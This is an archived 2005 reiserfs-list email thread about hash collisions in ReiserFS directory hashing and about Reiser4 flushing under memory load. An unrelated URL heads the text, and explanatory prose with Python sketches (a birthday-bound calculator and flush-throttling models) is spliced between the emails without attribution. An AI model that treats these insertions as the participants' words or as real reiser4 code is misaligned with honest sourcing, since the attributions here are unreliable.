http://www.stencilsunlimited.com/stencil_article_page5.htm
* Re: Congratulations! we have got hash function screwed up
2005-01-06 14:27 ` Lehmann
2005-01-06 15:56 ` Hans Reiser
@ 2005-01-06 18:55 ` Edward Shishkin
2005-01-07 17:26 ` Lehmann
1 sibling, 1 reply; 26+ messages in thread
From: Edward Shishkin @ 2005-01-06 18:55 UTC (permalink / raw)
To: pcg; +Cc: Alex Zarochentsev, reiserfs-list, stefan
Marc A. Lehmann <pcg@goof.com> wrote:
>On Thu, Jan 06, 2005 at 03:45:06PM +0300, Alex Zarochentsev <zam@namesys.com> wrote:
>
>
>>>generic bug in handling hash collisions?
>>>
>>>
>>Tea hash is designed to be more resistant.
>>
>>
Actually, it cannot be more resistant, as it uses the same 32-bit output
size. So to find a collision you just need to hash about 2^16 = 65536
random documents.
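The 2^16 figure is the usual birthday bound for a 32-bit output. A rough sketch of the arithmetic follows, assuming hash values are uniformly distributed (which real filenames need not be); the function names are made up for this example.

```python
import math


def collision_probability(n_items, hash_bits):
    """Approximate chance that at least two of n_items uniformly random
    hash values collide: 1 - exp(-n(n-1) / (2 * 2**bits))."""
    space = 2.0 ** hash_bits
    return -math.expm1(-n_items * (n_items - 1) / (2.0 * space))


def items_for_probability(p, hash_bits):
    """Approximate number of random items needed to reach collision
    probability p, from n ~ sqrt(2 * 2**bits * ln(1 / (1 - p)))."""
    space = 2.0 ** hash_bits
    return math.ceil(math.sqrt(2.0 * space * math.log(1.0 / (1.0 - p))))


if __name__ == "__main__":
    print(collision_probability(2 ** 16, 32))   # roughly 0.39
    print(items_for_probability(0.5, 32))       # roughly 77,000
```

So 65536 random names already give about a 39% chance of at least one collision, and the chance passes one half at around 77,000 names.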
>
>As the example posted shows, tea doesn't look better, it generates
>nicely-looking collisions, too.
>
>
>
>I'd suggest getting rid of reiserfs on anything important. I can't have it
>when my filesystem randomly returns errors when it should be working.
>
>I wonder whether this hasn't any security relevance, as it allows attackers
>easily to create filename holes in the filesystem that even root cannot
>override.
>
>
There should be a weighty reason to use a strong hash function for creating
entries, because a stable hash means bad performance and more space occupied
in stat-data. I am not sure that even 160 bits would guarantee the absence of
collisions for a long time.
Edward.
>Thanks for the suggestion, though! However, the workaround I currently use
>(delete the dir, reinstall) works better, as it doesn't destroy debian's
>idea of the filesystem layout.
>
>
>
* Re: Congratulations! we have got hash function screwed up
2005-01-06 16:26 ` Chris Dukes
2005-01-06 16:29 ` Spam
@ 2005-01-07 17:22 ` Hans Reiser
2005-01-07 17:28 ` Chris Dukes
2005-01-07 23:27 ` flush earlier? (was Re: Congratulations! we have got hash function screwed up) David Masover
1 sibling, 2 replies; 26+ messages in thread
From: Hans Reiser @ 2005-01-07 17:22 UTC (permalink / raw)
To: Chris Dukes; +Cc: Spam, reiserfs-list
Chris Dukes wrote:
>
>
>All filesystems will fail or suffer degraded performance under
>certain conditions, you need to determine what conditions are acceptable
>for your data.
>
>
>
and each generation of software reduces the extent of such conditions.
Reiser4 fixes this problem cleanly.
* Re: Congratulations! we have got hash function screwed up
2005-01-06 18:55 ` Congratulations! we have got hash function screwed up Edward Shishkin
@ 2005-01-07 17:26 ` Lehmann
0 siblings, 0 replies; 26+ messages in thread
From: Lehmann @ 2005-01-07 17:26 UTC (permalink / raw)
To: Edward Shishkin; +Cc: Alex Zarochentsev, reiserfs-list, stefan
On Thu, Jan 06, 2005 at 09:55:20PM +0300, Edward Shishkin <edward@namesys.com> wrote:
> >On Thu, Jan 06, 2005 at 03:45:06PM +0300, Alex Zarochentsev
> ><zam@namesys.com> wrote:
> >>>
> >>Tea hash is designed to be more resistant.
> >>
> >>
>
> Actually this can not be more resistant as it uses the same 32-bit output
> size.
Sure it can. Filenames are not randomly distributed, so your argument doesn't
suffice to show that tea cannot be more resistant, as it could be more
resistant for other reasons.
That's why I originally wrote "nicely-looking", which (if it wasn't clear)
was meant to say that filenames with somewhat similar names do collide
even with tea, which supposedly was chosen to avoid this case.
> So to find a collision you just need to find hashes of 2^16 = 65536
> random documents.
True. It's even worse if these collisions happen to filenames occurring in
practice.
(I also agree with the rest of your mail)
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
* Re: Congratulations! we have got hash function screwed up
2005-01-07 17:22 ` Hans Reiser
@ 2005-01-07 17:28 ` Chris Dukes
2005-01-07 23:27 ` flush earlier? (was Re: Congratulations! we have got hash function screwed up) David Masover
1 sibling, 0 replies; 26+ messages in thread
From: Chris Dukes @ 2005-01-07 17:28 UTC (permalink / raw)
To: Hans Reiser; +Cc: Spam, reiserfs-list
On Fri, Jan 07, 2005 at 09:22:02AM -0800, Hans Reiser wrote:
> Chris Dukes wrote:
>
> >
> >
> >All filesystems will fail or suffer degraded performance under
> >certain conditions, you need to determine what conditions are acceptable
> >for your data.
> >
> >
> >
> and each generation of software reduces the extent of such conditions.
> Reiser4 fixes this problem cleanly.
Should reduce. I currently have the misfortune of supporting
some software that seems to be of the "For every bug fixed at least
one bug with an equal level of impact is introduced" variety.
--
Chris Dukes
hello stacklimit my old friend, I've come to visit you again
* flush earlier? (was Re: Congratulations! we have got hash function screwed up)
2005-01-07 17:22 ` Hans Reiser
2005-01-07 17:28 ` Chris Dukes
@ 2005-01-07 23:27 ` David Masover
2005-01-07 23:52 ` Hans Reiser
1 sibling, 1 reply; 26+ messages in thread
From: David Masover @ 2005-01-07 23:27 UTC (permalink / raw)
To: Hans Reiser; +Cc: Chris Dukes, Spam, reiserfs-list
Hans Reiser wrote:
| Chris Dukes wrote:
|
|>
|>
|> All filesystems will fail or suffer degraded performance under
|> certain conditions, you need to determine what conditions are acceptable
|> for your data.
|>
|>
|>
| and each generation of software reduces the extent of such conditions.
| Reiser4 fixes this problem cleanly.
I think Reiser4's degraded performance condition is when it gets lots of
RAM. First, a disclaimer -- I don't have the latest reiser4 patch. But
in all versions of the FS, I've found that if I'm ever trying to do
anything when reiser finally decides to flush to disk, basically my
whole system is locked up. I haven't tested, but I think this would
actually be worse with more RAM, because it would be longer until the
flush was forced, so each flush would take longer.
What is needed is some sort of estimator or estimate. An estimator
would be something that would flush when, based on recent fs load, it
was reasonable to expect that RAM would fill up just as the flush was
completing. An estimate would be to flush if a certain percentage of
RAM was full, and to go to synchronous mode if memory usage didn't go
back below that percentage.
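The two policies described in the message above ("estimator" and "estimate") can be sketched roughly as follows. This is only an illustration of the proposal, not reiser4 behaviour: `CacheState`, its fields, the function names and the 0.8 default threshold are all assumptions made for the example.

```python
from dataclasses import dataclass


@dataclass
class CacheState:
    capacity_pages: int   # pages of RAM available for dirty data
    dirty_pages: int      # pages currently waiting to be written
    dirty_rate: float     # pages/second being dirtied recently (measured)
    flush_rate: float     # pages/second the disk can absorb (measured)


def estimator_should_flush(s):
    """'Estimator': start flushing once the flush would take at least as
    long as the remaining RAM takes to fill at the recent dirtying rate."""
    if s.dirty_rate <= 0 or s.dirty_pages == 0:
        return False
    time_to_fill = (s.capacity_pages - s.dirty_pages) / s.dirty_rate
    time_to_flush = s.dirty_pages / s.flush_rate
    return time_to_flush >= time_to_fill


def threshold_action(s, threshold=0.8, flush_in_progress=False):
    """'Estimate': flush above a fixed fill percentage, and fall back to
    synchronous writes if usage is still above it while a flush is running."""
    if s.dirty_pages / s.capacity_pages < threshold:
        return "lazy"
    return "synchronous" if flush_in_progress else "flush"
```

The estimator needs two measured rates and adapts to load; the threshold variant needs only a single tunable, which is why it reads as the simpler stopgap.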
* Re: flush earlier? (was Re: Congratulations! we have got hash function screwed up)
2005-01-07 23:27 ` flush earlier? (was Re: Congratulations! we have got hash function screwed up) David Masover
@ 2005-01-07 23:52 ` Hans Reiser
2005-01-08 5:03 ` David Masover
0 siblings, 1 reply; 26+ messages in thread
From: Hans Reiser @ 2005-01-07 23:52 UTC (permalink / raw)
To: David Masover; +Cc: Chris Dukes, Spam, reiserfs-list
David Masover wrote:
> Hans Reiser wrote:
> | Chris Dukes wrote:
> |
> |>
> |>
> |> All filesystems will fail or suffer degraded performance under
> |> certain conditions, you need to determine what conditions are acceptable
> |> for your data.
> |>
> |>
> |>
> | and each generation of software reduces the extent of such conditions.
> | Reiser4 fixes this problem cleanly.
>
> I think Reiser4's degraded performance condition is when it gets lots of
> RAM. First, a disclaimer -- I don't have the latest reiser4 patch. But
> in all versions of the FS, I've found that if I'm ever trying to do
> anything when reiser finally decides to flush to disk, basically my
> whole system is locked up. I haven't tested, but I think this would
> actually be worse with more RAM, because it would be longer until the
> flush was forced, so each flush would take longer.
>
> What is needed is some sort of estimator or estimate. An estimator
> would be something that would flush when, based on recent fs load, it
> was reasonable to expect that RAM would fill up just as the flush was
> completing. An estimate would be to flush if a certain percentage of
> RAM was full, and to go to synchronous mode if memory usage didn't go
> back below that percentage.
We need to throttle rather than flush, so as to ensure that for every
page added to an atom, at least X pages must reach disk, until close to
the end of the atom when we just flush it out.
Another missing and needed feature....
Hans
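A minimal sketch of the throttling idea above, treating an atom simply as a FIFO queue of dirty pages. This is an assumption-laden model, not reiser4 code: `ThrottledAtom`, the `flush_all_at` cutoff and the `write_page` callback are hypothetical names, and "X" appears as `pages_out_per_page_in`.

```python
from collections import deque


class ThrottledAtom:
    """Toy atom: each page added forces some older pages out to disk."""

    def __init__(self, backlog, pages_out_per_page_in, flush_all_at, write_page):
        self.pending = deque(backlog)        # dirty pages not yet on disk
        self.x = pages_out_per_page_in       # the "X" from the message
        self.flush_all_at = flush_all_at     # additions after which we flush all
        self.write_page = write_page         # callback that writes one page
        self.added = 0

    def add_page(self, page):
        self.pending.append(page)
        self.added += 1
        if self.added >= self.flush_all_at:
            # Close to the end of the atom: just flush everything out.
            self._write(len(self.pending))
        else:
            # Throttle: the writer pays for its page with X pages of I/O.
            self._write(self.x)

    def _write(self, count):
        for _ in range(min(count, len(self.pending))):
            self.write_page(self.pending.popleft())
```

With X greater than one the backlog shrinks steadily while writers keep running, instead of growing until a single large flush stalls everything.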
* Re: flush earlier? (was Re: Congratulations! we have got hash function screwed up)
2005-01-07 23:52 ` Hans Reiser
@ 2005-01-08 5:03 ` David Masover
2005-01-08 20:48 ` Hans Reiser
0 siblings, 1 reply; 26+ messages in thread
From: David Masover @ 2005-01-08 5:03 UTC (permalink / raw)
To: Hans Reiser; +Cc: Chris Dukes, Spam, reiserfs-list
Hans Reiser wrote:
| David Masover wrote:
|
|> Hans Reiser wrote:
|> | Chris Dukes wrote:
|> |
|> |>
|> |>
|> |> All filesystems will fail or suffer degraded performance under
|> |> certain conditions, you need to determine what conditions are acceptable
|> |> for your data.
|> |>
|> |>
|> |>
|> | and each generation of software reduces the extent of such conditions.
|> | Reiser4 fixes this problem cleanly.
|>
|> I think Reiser4's degraded performance condition is when it gets lots of
|> RAM. First, a disclaimer -- I don't have the latest reiser4 patch. But
|> in all versions of the FS, I've found that if I'm ever trying to do
|> anything when reiser finally decides to flush to disk, basically my
|> whole system is locked up. I haven't tested, but I think this would
|> actually be worse with more RAM, because it would be longer until the
|> flush was forced, so each flush would take longer.
|>
|> What is needed is some sort of estimator or estimate. An estimator
|> would be something that would flush when, based on recent fs load, it
|> was reasonable to expect that RAM would fill up just as the flush was
|> completing. An estimate would be to flush if a certain percentage of
|> RAM was full, and to go to synchronous mode if memory usage didn't go
|> back below that percentage.
|
|
| We need to throttle rather than flush, so as to ensure that for every
| page added to an atom, at least X pages must reach disk, until close to
| the end of the atom when we just flush it out.
I'm not sure I understand that. Is the idea of that to build up a write
buffer which insists on flushing bytes off the front as they are added
onto the back, without flushing huge chunks at once?
Would that be as efficient at packing (no fragmentation)?
But the main problem was it would basically lock the fs entirely -- no
access at all. This especially hurts with read access. When fs is
under heavy load, I can wait several minutes to start a browser,
especially when a lot of writing is happening.
For now, how about a quick fix. Can we force a flush when we get to
80%? Is there a synchronous mode, and can we use that after 80%, or do
we have to fake it by trying to flush every few seconds?
* Re: flush earlier? (was Re: Congratulations! we have got hash function screwed up)
2005-01-08 5:03 ` David Masover
@ 2005-01-08 20:48 ` Hans Reiser
2005-01-09 23:26 ` David Masover
0 siblings, 1 reply; 26+ messages in thread
From: Hans Reiser @ 2005-01-08 20:48 UTC (permalink / raw)
To: David Masover; +Cc: Chris Dukes, Spam, reiserfs-list
David Masover wrote:
>
>
> Hans Reiser wrote:
> | David Masover wrote:
> |
> |> Hans Reiser wrote:
> |> | Chris Dukes wrote:
> |> |
> |> |>
> |> |>
> |> |> All filesystems will fail or suffer degraded performance under
> |> |> certain conditions, you need to determine what conditions are acceptable
> |> |> for your data.
> |> |>
> |> |>
> |> |>
> |> | and each generation of software reduces the extent of such conditions.
> |> | Reiser4 fixes this problem cleanly.
> |>
> |> I think Reiser4's degraded performance condition is when it gets lots of
> |> RAM. First, a disclaimer -- I don't have the latest reiser4 patch. But
> |> in all versions of the FS, I've found that if I'm ever trying to do
> |> anything when reiser finally decides to flush to disk, basically my
> |> whole system is locked up. I haven't tested, but I think this would
> |> actually be worse with more RAM, because it would be longer until the
> |> flush was forced, so each flush would take longer.
> |>
> |> What is needed is some sort of estimator or estimate. An estimator
> |> would be something that would flush when, based on recent fs load, it
> |> was reasonable to expect that RAM would fill up just as the flush was
> |> completing. An estimate would be to flush if a certain percentage of
> |> RAM was full, and to go to synchronous mode if memory usage didn't go
> |> back below that percentage.
> |
> |
> | We need to throttle rather than flush, so as to ensure that for every
> | page added to an atom, at least X pages must reach disk, until close to
> | the end of the atom when we just flush it out.
>
> I'm not sure I understand that. Is the idea of that to build up a write
> buffer which insists on flushing bytes off the front as they are added
> onto the back, without flushing huge chunks at once?
Yes.
>
> Would that be as efficient at packing (no fragmentation)?
No.
>
> But the main problem was it would basically lock the fs entirely -- no
> access at all.
Which is why we need to allow fusing a little bit.
> This especially hurts with read access.
Read access? Do you have one CPU? Maybe the problem isn't what I
thought it was.
> When fs is
> under heavy load, I can wait several minutes to start a browser,
> especially when a lot of writing is happening.
>
> For now, how about a quick fix. Can we force a flush when we get to
> 80%?
VM already has an asynchronous flush mechanism. We just need to clean
up our interaction with it a bit to smooth things out.
> Is there a synchronous mode, and can we use that after 80%, or do
> we have to fake it by trying to flush every few seconds?
>
* Re: flush earlier? (was Re: Congratulations! we have got hash function screwed up)
2005-01-08 20:48 ` Hans Reiser
@ 2005-01-09 23:26 ` David Masover
0 siblings, 0 replies; 26+ messages in thread
From: David Masover @ 2005-01-09 23:26 UTC (permalink / raw)
To: Hans Reiser; +Cc: Chris Dukes, Spam, reiserfs-list
Hans Reiser wrote:
[...]
|> I'm not sure I understand that. Is the idea of that to build up a write
|> buffer which insists on flushing bytes off the front as they are added
|> onto the back, without flushing huge chunks at once?
|
|
| Yes.
|
|>
|> Would that be as efficient at packing (no fragmentation)?
|
|
| No.
Really? I'd think that it would waste more CPU, but you could actually
end up packing better, if you allocate for the end of the buffer as it's
flushed, because you can look at the whole buffer and what's already on
disk. What would be a good idea with one flush could be inefficient by
the next, and this system can react faster to that change.
But, there's still laptops, and there's CPU usage.
Will it be hard to implement both approaches? One example would be
someone trying to create a clean fs "image", or someone who's installing
software, so they don't care how long it takes, but they do want it to
be tightly packed. Someone who can't afford the repacker :(
|> But the main problem was it would basically lock the fs entirely -- no
|> access at all.
|
|
| Which is why we need to allow fusing a little bit.
What do you mean by "fusing" here?
|> This especially hurts with read access.
|
|
| Read access? Do you have one CPU? Maybe the problem isn't what I
| thought it was.
Yes, I have one CPU. But I only have one reiser4 drive per machine. I
think that reiser4 locks all fs access until the flush is done, or at
least it used to. But even if it didn't, reads take _forever_ when the
disk is in use, and reads are usually more urgent than writes (hence
asynchronous writes). And the disk will be in use trying to write a
huge chunk of data for some time, and will take longer the more RAM you
have.
|> For now, how about a quick fix. Can we force a flush when we get to
|> 80%?
|
|
| VM already has an asynchronous flush mechanism. We just need to clean
| up our interaction with it a bit to smooth things out.
What I want to avoid is doing away with lazy writes entirely (laptops)
and doing something like ext3's "flush every five seconds" concept. But
I also want to avoid truly _massive_ spikes in disk activity.
That's what the 80% is about. You still get lazy writes, but they can
be at a lower priority than reads, hopefully minimizing seeks, too --
thrashing between reading and writing. But when the lazy write happens,
you don't slow down the rest of the system, because it still has some
room to write.
end of thread
Thread overview: 26+ messages
2004-12-28 22:12 Congratulations! we have got hash function screwed up Lehmann
2004-12-29 18:55 ` Stefan Traby
2004-12-29 21:04 ` Lehmann
2004-12-29 21:05 ` Hans Reiser
2004-12-29 21:43 ` Lehmann
2004-12-29 21:46 ` Christian Iversen
2004-12-29 22:27 ` Lehmann
2004-12-30 2:05 ` Hans Reiser
2004-12-30 10:22 ` Matthias Andree
2004-12-30 17:02 ` Lehmann
2005-01-06 12:45 ` Alex Zarochentsev
2005-01-06 14:27 ` Lehmann
2005-01-06 15:56 ` Hans Reiser
2005-01-06 16:13 ` Spam
2005-01-06 16:26 ` Chris Dukes
2005-01-06 16:29 ` Spam
2005-01-06 16:56 ` Chris Dukes
2005-01-07 17:22 ` Hans Reiser
2005-01-07 17:28 ` Chris Dukes
2005-01-07 23:27 ` flush earlier? (was Re: Congratulations! we have got hash function screwed up) David Masover
2005-01-07 23:52 ` Hans Reiser
2005-01-08 5:03 ` David Masover
2005-01-08 20:48 ` Hans Reiser
2005-01-09 23:26 ` David Masover
2005-01-06 18:55 ` Congratulations! we have got hash function screwed up Edward Shishkin
2005-01-07 17:26 ` Lehmann